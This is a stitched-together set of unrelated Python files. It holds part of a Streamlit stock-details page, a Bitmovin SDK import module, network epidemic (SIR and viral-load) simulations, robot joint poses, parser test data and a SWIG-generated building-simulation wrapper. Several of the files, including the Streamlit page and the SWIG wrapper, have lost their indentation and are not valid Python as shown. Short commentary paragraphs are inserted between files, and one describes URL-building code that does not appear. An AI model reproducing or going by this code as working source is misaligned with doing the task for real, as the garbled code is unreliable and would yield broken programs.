unsafe_allow_html=True)
except :
try :
st.markdown('<div style="color:green"><b >Address : </b>' + info['address1'] + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >City : </b>' + info['city'] + '</div>',
unsafe_allow_html=True)
except :
pass
st.markdown('<div style="color:green"><b >Country : </b>' + info['country'] + '</div>',
unsafe_allow_html=True)
try :
st.markdown('<div style="color:green"><b >Phone : </b>' + str(info['phone']) + '</div>',
unsafe_allow_html=True)
except :
pass
try:
st.markdown('<div style="color:green"><b >Website : </b><a href="' + str(info['website']) + '">' + str(info['website']) + '</a></div>',
unsafe_allow_html=True)
except:
pass
st.title('Share Details')
try :
st.markdown('<div style="color:green"><b >Exchange : </b>' + info['exchange'] + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Symbol : </b>' + info['symbol'] + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown(
'<div style="color:green"><b >Currency : </b>' + info['financialCurrency'] + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Type : </b>' + info['quoteType'] + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown(
'<div style="color:green"><b >Total Cash : </b>' + str(info['totalCash']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown(
'<div style="color:green"><b >Total Debt : </b>' + str(info['totalDebt']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown(
'<div style="color:green"><b >Total Revenue : </b>' + str(info['totalRevenue']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown(
'<div style="color:green"><b >Market Cap : </b>' + str(info['marketCap']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Total Cash Per Share : </b>' + str(
info['totalCashPerShare']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Revenue Per Share : </b>' + str(
info['revenuePerShare']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Shares Outstanding : </b>' + str(
info['sharesOutstanding']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Target Low : </b>' + str(
info['targetLowPrice']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Target High : </b>' + str(
info['targetHighPrice']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Recommendation : </b>' + str(
info['recommendationKey']) + '</div>',
unsafe_allow_html=True)
except :
pass
st.title('Advance Details')
try :
st.markdown('<div style="color:green"><b >Operating Margins : </b>' + str(
info['operatingMargins']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Profit Margins : </b>' + str(
info['profitMargins']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Shares Outstanding : </b>' + str(
info['grossMargins']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Gross Profits : </b>' + str(
info['grossProfits']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Revenue Growth : </b>' + str(
info['revenueGrowth']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Earnings Growth : </b>' + str(
info['earningsGrowth']) + '</div>',
unsafe_allow_html=True)
except :
pass
if function_select == 'Dividend and Stock Splits' :
try:
st.table(ticker.actions.reset_index())
except:
st.info("This information is not available for the selected symbol")
if function_select == 'Financials' :
try:
st.table(ticker.financials.reset_index())
except:
st.info("This information is not available for the selected symbol")
if function_select == 'Major Holders' :
try:
st.table(ticker.major_holders)
except:
st.info("This information is not available for the selected symbol")
if function_select == 'Institutional Holders' :
try:
st.table(ticker.institutional_holders)
except:
st.info("This information is not available for the selected symbol")
if function_select == 'Balance sheet' :
try:
st.table(ticker.balance_sheet.reset_index())
except:
st.info("This information is not available for the selected symbol")
if function_select == 'Recommendations' :
try:
st.table(ticker.recommendations.reset_index())
except:
st.info("This information is not available for the selected symbol")
if function_select == 'Cashflow' :
try:
st.table(ticker.cashflow.reset_index())
except:
st.info("This information is not available for the selected symbol")
if function_select == 'Earnings' :
try:
st.table(ticker.earnings.reset_index())
except:
st.info("This information is not available for the selected symbol")
except Exception as e :
st.warning('Either there is connection error or symbol/ticker is not found in our system')
st.write(e)
else:
st.info('For Indian stocks, only the National Stock Exchange (NSE/NS) is supported; for the Bombay Stock Exchange (BSE/BS), select the "Indian Stocks" option from the sidebar')
st.write('')
st.warning('In case of any error, try clicking the rerun button at the top left after 1 minute')
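The requests above assemble Alpha Vantage URLs by string concatenation. A hedged alternative (hypothetical helper name) composes the query with `urlencode`, which also handles escaping:

```python
from urllib.parse import urlencode

BASE = "https://www.alphavantage.co/query"

def build_query_url(function, symbol, outputsize, apikey, **extra):
    # Hypothetical helper; keys mirror the Alpha Vantage query parameters
    params = {"function": function, "symbol": symbol,
              "outputsize": outputsize, "apikey": apikey}
    params.update(extra)
    return BASE + "?" + urlencode(params)

url = build_query_url("TIME_SERIES_DAILY", "RELIANCE.BSE", "compact", "demo")
```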
# bitmovin_api_sdk/encoding/encodings/muxings/fmp4/drm/widevine/__init__.py (repo: jaythecaesarean/bitmovin-api-sdk-python, license: MIT)
from bitmovin_api_sdk.encoding.encodings.muxings.fmp4.drm.widevine.widevine_api import WidevineApi
from bitmovin_api_sdk.encoding.encodings.muxings.fmp4.drm.widevine.customdata.customdata_api import CustomdataApi
from bitmovin_api_sdk.encoding.encodings.muxings.fmp4.drm.widevine.widevine_drm_list_query_params import WidevineDrmListQueryParams
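`__init__` modules like this one re-export submodule symbols at package level so callers can import them directly. A minimal self-contained sketch of the pattern (stand-in module names, not the real SDK):

```python
import sys
import types

# Stand-in package and submodule (hypothetical names, not the real SDK)
pkg = types.ModuleType("widevine_demo")
sub = types.ModuleType("widevine_demo.api")
sub.WidevineApi = type("WidevineApi", (), {})
sys.modules["widevine_demo"] = pkg
sys.modules["widevine_demo.api"] = sub

# What the __init__ does: lift the symbol into the package namespace
pkg.WidevineApi = sub.WidevineApi

from widevine_demo import WidevineApi
```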
# Simulations/simulations.py (repo: nwlandry/time-dependent-infectiousness, license: BSD-3-Clause)
from collections import defaultdict
import numpy as np
import random
def SIR_model_static_network(G, gamma, beta, dt=1, initial_infecteds=None, tmin=0, tmax=np.inf):
    if initial_infecteds is None:
        initial_infecteds = []
    state = defaultdict(lambda: "S")
    new_state = state.copy()
    for infected in initial_infecteds:
        state[infected] = 'I'
    n = G.number_of_nodes()
    t = tmin
    times = [tmin]
    I = [len(initial_infecteds)]
    S = [n - I[0]]
    R = [0]
    while t < tmax and I[-1] != 0:
        S.append(S[-1])
        I.append(I[-1])
        R.append(R[-1])
        for node in G.nodes:
            if state[node] == "I":
                # heal
                if random.random() <= gamma*dt:
                    new_state[node] = "R"
                    R[-1] += 1
                    I[-1] += -1
                else:
                    new_state[node] = "I"
            elif state[node] == "S":
                # infect by neighbors
                for nbr in G.neighbors(node):
                    if state[nbr] == "I" and random.random() <= beta*dt:
                        new_state[node] = "I"
                        S[-1] += -1
                        I[-1] += 1
                        break
                else:
                    new_state[node] = "S"  # was "==", a no-op comparison
        state = new_state.copy()
        t += dt
        times.append(t)
    return np.array(times), np.array(S), np.array(I), np.array(R)
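Per step, a susceptible node becomes infected if at least one infected neighbor independently succeeds with probability beta*dt, which the neighbor loop above implements with an early break. The same rule in isolation (hypothetical helper, not part of the original module):

```python
import random

def infected_this_step(n_infected_nbrs, beta, dt, rng=random.random):
    # One Bernoulli trial per infected neighbor; any success infects the
    # node, matching the break-on-first-success loop in the simulation.
    return any(rng() <= beta * dt for _ in range(n_infected_nbrs))

# With beta*dt = 1 every neighbor transmits; with no neighbors nothing can.
always = infected_this_step(3, 1.0, 1.0)
never = infected_this_step(0, 0.9, 1.0)
```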
def SIR_model_temporal_network(Glist, n, gamma, beta, dt=1, initial_infecteds=None, tmin=0, tmax=np.inf):
state = defaultdict( lambda : "S" )
new_state = state.copy()
for infected in initial_infecteds:
state[infected] = 'I'
t = tmin
times = [tmin]
I = [len(initial_infecteds)]
S = [n - I[0]]
R = [0]
index = 0
while t < tmax and I[-1] != 0 and index < len(Glist):
S.append(S[-1])
I.append(I[-1])
R.append(R[-1])
G = Glist[index]
for node in G.nodes:
if state[node] == "I":
# heal
if random.random() <= gamma*dt:
new_state[node] = "R"
R[-1] += 1
I[-1] += -1
else:
new_state[node] = "I"
elif state[node] == "S":
# infect by neighbors
for nbr in G.neighbors(node):
if state[nbr] == "I" and random.random() <= beta*dt:
new_state[node] = "I"
S[-1] += -1
I[-1] += 1
break
else:
new_state[node] = "S"
state = new_state.copy()
t += dt
times.append(t)
index += 1
return np.array(times), np.array(S), np.array(I), np.array(R)
def VL_model_static_network(G, beta, tauR, dt=1, initial_infecteds=None, tmin=0, tmax=np.inf, return_infection_distribution=False):
infected_time = dict()
state = defaultdict( lambda : "S" )
new_state = state.copy()
for infected in initial_infecteds:
state[infected] = 'I'
infected_time[infected] = tmin
n = G.number_of_nodes()
t = tmin
times = [tmin]
I = [len(initial_infecteds)]
S = [n - I[0]]
R = [0]
if return_infection_distribution:
infection_distribution = np.zeros((round((tmax - tmin)/dt)+1, round(max(tauR)/dt)+1))
infection_distribution[0, 0] = I[-1]
while t < tmax and I[-1] != 0:
S.append(S[-1])
I.append(I[-1])
R.append(R[-1])
for node in G.nodes:
if state[node] == "I":
# heal
if t - infected_time[node] >= tauR[node]:
new_state[node] = "R"
R[-1] += 1
I[-1] += -1
else:
new_state[node] = "I"
elif state[node] == "S":
# infect by neighbors
for nbr in G.neighbors(node):
if state[nbr] == "I" and random.random() <= beta[node](t - infected_time[nbr])*dt:
new_state[node] = "I"
infected_time[node] = t + dt
S[-1] += -1
I[-1] += 1
break
else:
new_state[node] = "S"
state = new_state.copy()
t += dt
times.append(t)
if return_infection_distribution:
for node in state:
if state[node] == "I":
try:
infection_distribution[round((t - tmin)/dt), round((t - infected_time[node])/dt)] += 1
except:
pass
if return_infection_distribution:
return np.array(times), np.array(S), np.array(I), np.array(R), infection_distribution
else:
return np.array(times), np.array(S), np.array(I), np.array(R)
def VL_model_temporal_network(Glist, n, beta, tauR, dt=1, initial_infecteds=None, tmin=0, tmax=np.inf, return_infection_distribution=False):
infected_time = dict()
state = defaultdict( lambda : "S" )
new_state = state.copy()
for infected in initial_infecteds:
state[infected] = 'I'
infected_time[infected] = tmin
t = tmin
times = [tmin]
I = [len(initial_infecteds)]
S = [n - I[0]]
R = [0]
index = 0
if return_infection_distribution:
infection_distribution = np.zeros((min(round((tmax - tmin)/dt)+1, len(Glist)+1), round(max(tauR)/dt)+1))
infection_distribution[index, 0] = I[-1]
while t < tmax and I[-1] != 0 and index < len(Glist):
S.append(S[-1])
I.append(I[-1])
R.append(R[-1])
G = Glist[index]
for node in G.nodes:
if state[node] == "I":
# heal
if t - infected_time[node] >= tauR[node]:
new_state[node] = "R"
R[-1] += 1
I[-1] += -1
else:
new_state[node] = "I"
elif state[node] == "S":
# infect by neighbors
for nbr in G.neighbors(node):
if state[nbr] == "I" and random.random() <= beta[node](t - infected_time[nbr])*dt:
new_state[node] = "I"
infected_time[node] = t + dt
S[-1] += -1
I[-1] += 1
break
else:
new_state[node] = "S"
state = new_state.copy()
t += dt
times.append(t)
index += 1
if return_infection_distribution:
for node in state:
if state[node] == "I":
try:
infection_distribution[index, round((t - infected_time[node])/dt)] += 1
except:
pass
if return_infection_distribution:
return np.array(times), np.array(S), np.array(I), np.array(R), infection_distribution
else:
return np.array(times), np.array(S), np.array(I), np.array(R)
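The VL models evaluate `beta[node]` as a callable of the time elapsed since infection, so any profile function works. A hypothetical piecewise-linear (triangular) infectiousness curve, for illustration only:

```python
def triangular_beta(peak_time, duration, peak_value):
    # Hypothetical profile: rises linearly to peak_value at peak_time,
    # then decays linearly to zero at `duration`; zero outside [0, duration].
    def beta(tau):
        if tau < 0 or tau > duration:
            return 0.0
        if tau <= peak_time:
            return peak_value * tau / peak_time
        return peak_value * (duration - tau) / (duration - peak_time)
    return beta

b = triangular_beta(peak_time=3.0, duration=10.0, peak_value=0.5)
```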
def generatePowerLawDegreeSequence(n, minDegree, maxDegree, exponent):
    degrees = np.round(invCDFPowerLaw(np.random.rand(n), minDegree, maxDegree, exponent)).astype(int)
    # ensure the degree sum is even so a simple graph can realize the sequence
    if sum(degrees) % 2 != 0:
        degrees[random.randrange(n)] += 1
    return degrees


def invCDFPowerLaw(u, minDegree, maxDegree, exponent):
    return (minDegree**(1-exponent) + u*(maxDegree**(1-exponent) - minDegree**(1-exponent)))**(1/(1-exponent))
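`invCDFPowerLaw` maps u in [0, 1] onto [minDegree, maxDegree] by inverse-transform sampling. A quick endpoint and monotonicity check (the transform is restated here so the snippet is self-contained):

```python
import numpy as np

def inv_cdf_power_law(u, kmin, kmax, exponent):
    # Same transform as invCDFPowerLaw above
    return (kmin**(1 - exponent)
            + u * (kmax**(1 - exponent) - kmin**(1 - exponent)))**(1 / (1 - exponent))

u = np.linspace(0.0, 1.0, 5)
k = inv_cdf_power_law(u, 10.0, 100.0, 3.0)
```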
# src/pytest_springfield/__init__.py (repo: thevarunjain/springfield, license: BSD-3-Clause)
from __future__ import absolute_import
from .assertrepr_compare import pytest_assertrepr_compare
# positions.py (repo: filesmuggler/ts2020_manipulator, license: MIT)
start = [90.0, 30.0, 30.0, 0.0, 0.0, 0.0]
scan = [90.0, 90.0, 0.0, 0.0, 0.0, 0.0]
grip = [90.0, 120.0, 30.0, 0.0, 0.0, 0.0]
evaluate = [90.0, 120.0, -30.0, 0.0, 0.0, 0.0]
trash = [-90.0, 120.0, 30.0, 0.0, 0.0, 0.0]
transport_a = [180.0, 120.0, 30.0, 0.0, 0.0, 0.0]
transport_b = [0.0, 120.0, 30.0, 0.0, 0.0, 0.0]
detach = [-90.0, 140.0, 20.0, 0.0, 0.0, 0.0]
detach_a = [180.0, 140.0, 20.0, 0.0, 0.0, 0.0]
detach_b = [0.0, 140.0, 20.0, 0.0, 0.0, 0.0]
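Each entry above is a six-joint pose in degrees. A hypothetical helper (not part of the original project) that linearly interpolates between two of these poses:

```python
def interpolate_pose(a, b, t):
    # Blend two 6-joint poses componentwise; t=0 gives a, t=1 gives b.
    return [ai + t * (bi - ai) for ai, bi in zip(a, b)]

start = [90.0, 30.0, 30.0, 0.0, 0.0, 0.0]
scan = [90.0, 90.0, 0.0, 0.0, 0.0, 0.0]
halfway = interpolate_pose(start, scan, 0.5)
```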
# ast/testdata/func_oneline.py (repo: MaxTurchin/pycopy-lib, license: PSF-2.0)
def foo(): pass
def foo(): pass;
def foo(): pass; pass
def foo(): pass; pass;
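These one-line bodies are test inputs for an `ast` implementation; CPython's own `ast` module parses a semicolon-separated suite after the colon into multiple statements:

```python
import ast

# A one-line function body with two statements, as in the test data above
tree = ast.parse("def foo(): pass; pass")
fn = tree.body[0]
```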
# SimModel_Python_API/simmodel_swig/Release/SimSpatialZone_ThermalZone_Default.py (repo: EnEff-BIM/EnEffBIM-Framework, license: MIT)
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.7
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_SimSpatialZone_ThermalZone_Default', [dirname(__file__)])
except ImportError:
import _SimSpatialZone_ThermalZone_Default
return _SimSpatialZone_ThermalZone_Default
if fp is not None:
try:
_mod = imp.load_module('_SimSpatialZone_ThermalZone_Default', fp, pathname, description)
finally:
fp.close()
return _mod
_SimSpatialZone_ThermalZone_Default = swig_import_helper()
del swig_import_helper
else:
import _SimSpatialZone_ThermalZone_Default
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr_nondynamic(self, class_type, name, static=1):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
if (not static):
return object.__getattr__(self, name)
else:
raise AttributeError(name)
def _swig_getattr(self, class_type, name):
return _swig_getattr_nondynamic(self, class_type, name, 0)
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object:
pass
_newclass = 0
try:
import weakref
weakref_proxy = weakref.proxy
except:
weakref_proxy = lambda x: x
import base
class SimSpatialZone(base.SimGroup):
__swig_setmethods__ = {}
for _s in [base.SimGroup]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimSpatialZone, name, value)
__swig_getmethods__ = {}
for _s in [base.SimGroup]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimSpatialZone, name)
__repr__ = _swig_repr
def ZoneColorIndex(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ZoneColorIndex(self, *args)
def SHWFixtureSets(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_SHWFixtureSets(self, *args)
def ContainingBuilding(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ContainingBuilding(self, *args)
def ZoneTemplates(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ZoneTemplates(self, *args)
def OverrideTemplates(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_OverrideTemplates(self, *args)
def __init__(self, *args):
this = _SimSpatialZone_ThermalZone_Default.new_SimSpatialZone(*args)
try:
self.this.append(this)
except:
self.this = this
def _clone(self, f=0, c=None):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone__clone(self, f, c)
__swig_destroy__ = _SimSpatialZone_ThermalZone_Default.delete_SimSpatialZone
__del__ = lambda self: None
SimSpatialZone_swigregister = _SimSpatialZone_ThermalZone_Default.SimSpatialZone_swigregister
SimSpatialZone_swigregister(SimSpatialZone)
class SimSpatialZone_ThermalZone(SimSpatialZone):
__swig_setmethods__ = {}
for _s in [SimSpatialZone]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimSpatialZone_ThermalZone, name, value)
__swig_getmethods__ = {}
for _s in [SimSpatialZone]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimSpatialZone_ThermalZone, name)
__repr__ = _swig_repr
def __init__(self, *args):
this = _SimSpatialZone_ThermalZone_Default.new_SimSpatialZone_ThermalZone(*args)
try:
self.this.append(this)
except:
self.this = this
def _clone(self, f=0, c=None):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone__clone(self, f, c)
__swig_destroy__ = _SimSpatialZone_ThermalZone_Default.delete_SimSpatialZone_ThermalZone
__del__ = lambda self: None
SimSpatialZone_ThermalZone_swigregister = _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_swigregister
SimSpatialZone_ThermalZone_swigregister(SimSpatialZone_ThermalZone)
class SimSpatialZone_ThermalZone_Default(SimSpatialZone_ThermalZone):
__swig_setmethods__ = {}
for _s in [SimSpatialZone_ThermalZone]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimSpatialZone_ThermalZone_Default, name, value)
__swig_getmethods__ = {}
for _s in [SimSpatialZone_ThermalZone]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimSpatialZone_ThermalZone_Default, name)
__repr__ = _swig_repr
def ZoneConditioningRequirement(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneConditioningRequirement(self, *args)
def HVACSystemType(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_HVACSystemType(self, *args)
def UserDefinedHVACSystemType(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_UserDefinedHVACSystemType(self, *args)
def InfiltrationRate(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_InfiltrationRate(self, *args)
def IsDaylitZone(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_IsDaylitZone(self, *args)
def NumberOfDaylightingSensors(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_NumberOfDaylightingSensors(self, *args)
def DesignIlluminance(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_DesignIlluminance(self, *args)
def LightingControlsType(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_LightingControlsType(self, *args)
def ClassRef_ZoneTypeEnergy(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ClassRef_ZoneTypeEnergy(self, *args)
def AssignedSchedule(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_AssignedSchedule(self, *args)
def SimSpatialZone_DirRelNorth(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_DirRelNorth(self, *args)
def SimSpatialZone_XOrigin(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_XOrigin(self, *args)
def SimSpatialZone_YOrigin(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_YOrigin(self, *args)
def SimSpatialZone_ZOrigin(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_ZOrigin(self, *args)
def SimSpatialZone_Type(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_Type(self, *args)
def SimSpatialZone_Mult(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_Mult(self, *args)
def SimSpatialZone_CeilingHt(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_CeilingHt(self, *args)
def SimSpatialZone_Volume(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_Volume(self, *args)
def SimSpatialZone_FloorArea(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_FloorArea(self, *args)
def SimSpatialZone_ZoneInsideConvAlgo(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_ZoneInsideConvAlgo(self, *args)
def SimSpatialZone_ZoneOutsdConvAlgo(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_ZoneOutsdConvAlgo(self, *args)
def SimSpatialZone_PartTotalFlrArea(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_SimSpatialZone_PartTotalFlrArea(self, *args)
def ZoneProp_UserViewFactors_bySurfName_ZoneName(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneProp_UserViewFactors_bySurfName_ZoneName(self, *args)
def ZoneProp_UserViewFactors_bySurfName_FromSurface_1_121(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneProp_UserViewFactors_bySurfName_FromSurface_1_121(self, *args)
def ZoneProp_UserViewFactors_bySurfName_ToSurface_1_121(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneProp_UserViewFactors_bySurfName_ToSurface_1_121(self, *args)
def ZoneProp_UserViewFactors_bySurfName_ViewFactor_1_121(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneProp_UserViewFactors_bySurfName_ViewFactor_1_121(self, *args)
def RmAirModelType_ZoneName(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_RmAirModelType_ZoneName(self, *args)
def RmAirModelType_RoomAirModType(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_RmAirModelType_RoomAirModType(self, *args)
def RmAirModelType_AirTempCplngStrat(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_RmAirModelType_AirTempCplngStrat(self, *args)
def ZoneAirBalance_OutdoorAir_ZoneName(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneAirBalance_OutdoorAir_ZoneName(self, *args)
def ZoneAirBalance_OutdoorAir_AirBalanceMethod(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneAirBalance_OutdoorAir_AirBalanceMethod(self, *args)
def ZoneAirBalance_OutdoorAir_InducedOutdrAirDueToUnbalDuctLeak(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneAirBalance_OutdoorAir_InducedOutdrAirDueToUnbalDuctLeak(self, *args)
def ZoneAirBalance_OutdoorAir_InducedOutdrAirScheduleName(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneAirBalance_OutdoorAir_InducedOutdrAirScheduleName(self, *args)
def ZoneHVAC_EquipConnections_ZoneName(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneHVAC_EquipConnections_ZoneName(self, *args)
def ZoneHVAC_EquipConnections_ZoneCondEqmtListName(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneHVAC_EquipConnections_ZoneCondEqmtListName(self, *args)
def ZoneHVAC_EquipConnections_ZoneAirInletNodeOrNodeListName(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneHVAC_EquipConnections_ZoneAirInletNodeOrNodeListName(self, *args)
def ZoneHVAC_EquipConnections_ZoneAirExhaustNodeOrNodeListName(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneHVAC_EquipConnections_ZoneAirExhaustNodeOrNodeListName(self, *args)
def ZoneHVAC_EquipConnections_ZoneAirNodeName(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneHVAC_EquipConnections_ZoneAirNodeName(self, *args)
def ZoneHVAC_EquipConnections_ZoneReturnAirNodeName(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_ZoneHVAC_EquipConnections_ZoneReturnAirNodeName(self, *args)
def __init__(self, *args):
this = _SimSpatialZone_ThermalZone_Default.new_SimSpatialZone_ThermalZone_Default(*args)
try:
self.this.append(this)
except:
self.this = this
def _clone(self, f=0, c=None):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default__clone(self, f, c)
__swig_destroy__ = _SimSpatialZone_ThermalZone_Default.delete_SimSpatialZone_ThermalZone_Default
__del__ = lambda self: None
SimSpatialZone_ThermalZone_Default_swigregister = _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_swigregister
SimSpatialZone_ThermalZone_Default_swigregister(SimSpatialZone_ThermalZone_Default)
class SimSpatialZone_ThermalZone_Default_sequence(base.sequence_common):
__swig_setmethods__ = {}
for _s in [base.sequence_common]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimSpatialZone_ThermalZone_Default_sequence, name, value)
__swig_getmethods__ = {}
for _s in [base.sequence_common]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimSpatialZone_ThermalZone_Default_sequence, name)
__repr__ = _swig_repr
def __init__(self, *args):
this = _SimSpatialZone_ThermalZone_Default.new_SimSpatialZone_ThermalZone_Default_sequence(*args)
try:
self.this.append(this)
except:
self.this = this
def assign(self, n, x):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_assign(self, n, x)
def begin(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_begin(self, *args)
def end(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_end(self, *args)
def rbegin(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_rbegin(self, *args)
def rend(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_rend(self, *args)
def at(self, *args):
return _SimSpatialZone_ThermalZone_Default.SimSpatialZone_ThermalZone_Default_sequence_at(self, *args)
def front(self, *args):
